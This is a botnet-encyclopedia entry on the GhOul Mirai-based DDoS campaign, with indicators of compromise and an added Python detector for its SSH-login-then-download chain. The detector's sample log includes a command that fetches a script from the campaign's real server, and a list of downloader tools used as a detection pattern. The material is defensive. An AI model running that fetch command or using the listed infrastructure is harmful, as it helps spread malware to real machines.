Botnet Encyclopedia

A Knowledge Base of Attack Campaigns captured by Guardicore Global Sensor Network

Campaign Information

Name

GhOul
active

First seen in Guardicore Centra

2020-06-11

Last seen in Guardicore Centra

2020-10-27

GhOul is a DDoS campaign that Guardicore’s sensors have captured since June 2020, although it was observed even earlier, around February. GhOul spreads over SSH to infect Linux-based machines with DDoS malware. The malware is Mirai-based, compiled for various architectures, and similar to the Helios and Hakai variants (see links below). Its list of C2 commands includes “TCP, SYN, ACK, XMAS, STOMP, UDPREG, UDPHEX, UDPRAW, HTTPSTOPM, HTTP, VSE, STD, OVH, STOP, KILL”; all appear to be DDoS attacks over various protocols using different payload formats. Most attacks captured by Guardicore’s sensors originated from machines belonging to OVH, France. The command-and-control servers (8 seen during the campaign’s active period) are located in Germany, France and Iran. C2 communication takes place over port 3333; this channel is how the bot receives its list of DDoS targets.


Attack Flow

Breached Services

SSH

Tags

Successful SSH Login

1 Shell Commands

Download Operation

Access Suspicious Domain

Outgoing Connection

SSH

Incident Summary

A user logged in using SSH with the following credentials: root / **** – Authentication policy: White List

Successful SSH Login

A possibly malicious Download Operation was detected 2 times

Download Operation

Process /bin/bash generated outgoing network traffic to: 51.178.225.200:80

Outgoing Connection

Process /bin/bash attempted to access suspicious domains: ip-51-178-225.eu

Outgoing Connection

Access Suspicious Domain

Connection was closed due to user inactivity
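The campaign description (SSH spread, download of a Mirai-based binary, C2 over port 3333) and the incident summary above (root SSH login, download operation, outbound traffic from /bin/bash to 51.178.225.200:80, lookup of ip-51-178-225.eu) describe the same chain of events. The following detector is an added example, not Guardicore's code: it correlates that chain over a constructed JSON-lines event stream. The event format, the field names, the 300-second correlation window and the downloader list are assumptions; only the IP, the domain and the C2 port come from the page.

```python
"""Detection logic for the GhOul infection chain (added example, not Guardicore's code).

Event format (assumed, not from the page): one JSON object per line with
"ts", "host", "kind" and kind-specific fields. Map your own sshd auth logs,
process-exec auditing and egress flow logs into this shape.
"""
import json

# Indicators taken from the campaign write-up and incident summary.
KNOWN_BAD_IPS = {"51.178.225.200"}
KNOWN_BAD_DOMAINS = {"ip-51-178-225.eu"}
C2_PORT = 3333

# Assumptions for the correlation logic (not from the page).
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")
WINDOW_S = 300  # a download this soon after an SSH login is treated as post-login activity

# Constructed sample telemetry: web-01 walks the GhOul chain, db-02 is benign.
SAMPLE_LOG = """
{"ts": 1000, "host": "web-01", "kind": "ssh_login", "user": "root", "src": "198.51.100.7", "result": "success"}
{"ts": 1010, "host": "web-01", "kind": "exec", "proc": "/bin/bash", "cmd": "wget http://51.178.225.200/bins.sh"}
{"ts": 1011, "host": "web-01", "kind": "dns", "proc": "/bin/bash", "query": "ip-51-178-225.eu"}
{"ts": 1012, "host": "web-01", "kind": "connect", "proc": "/bin/bash", "dst": "51.178.225.200", "dport": 80}
{"ts": 1040, "host": "web-01", "kind": "connect", "proc": "/tmp/x86", "dst": "203.0.113.9", "dport": 3333}
{"ts": 2000, "host": "db-02", "kind": "ssh_login", "user": "alice", "src": "10.0.0.5", "result": "success"}
{"ts": 2100, "host": "db-02", "kind": "connect", "proc": "/usr/bin/psql", "dst": "10.0.0.20", "dport": 5432}
"""


def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank lines, ordered by timestamp."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return sorted(events, key=lambda e: e["ts"])


def _is_downloader(cmd):
    """True if the command's program name (path stripped) is a known downloader."""
    parts = cmd.split()
    if not parts:
        return False
    return parts[0].rsplit("/", 1)[-1] in DOWNLOADERS


def detect(events):
    """Return alerts as (rule, host, ts) tuples, in event order."""
    alerts = []
    last_login = {}  # host -> ts of the most recent successful SSH login
    for ev in events:
        host, ts, kind = ev["host"], ev["ts"], ev["kind"]
        if kind == "ssh_login" and ev.get("result") == "success":
            last_login[host] = ts
            continue
        login_ts = last_login.get(host)
        recent_login = login_ts is not None and 0 <= ts - login_ts <= WINDOW_S

        if kind == "exec" and recent_login and _is_downloader(ev.get("cmd", "")):
            alerts.append(("post_login_download", host, ts))
        if kind == "dns" and ev.get("query") in KNOWN_BAD_DOMAINS:
            alerts.append(("ioc_domain", host, ts))
        if kind == "connect":
            if ev.get("dst") in KNOWN_BAD_IPS:
                alerts.append(("ioc_ip", host, ts))
            if ev.get("dport") == C2_PORT:
                # A lone connection to port 3333 is weak evidence; it is only
                # escalated when it follows a recent SSH login on the same host.
                rule = "c2_port_after_login" if recent_login else "c2_port_unconfirmed"
                alerts.append((rule, host, ts))
    return alerts


def detect_from_text(text):
    return detect(parse_events(text))


if __name__ == "__main__":
    for rule, host, ts in detect_from_text(SAMPLE_LOG):
        print(f"{ts} {host} {rule}")
```

On the sample stream, web-01 produces four alerts (post_login_download, ioc_domain, ioc_ip, c2_port_after_login) and db-02 none. The IP and domain rules are the cheapest to deploy but age quickly as infrastructure rotates; the login-then-download and login-then-port-3333 correlations describe the behaviour of the campaign rather than its current infrastructure, which is why they are kept separate from the indicator matches.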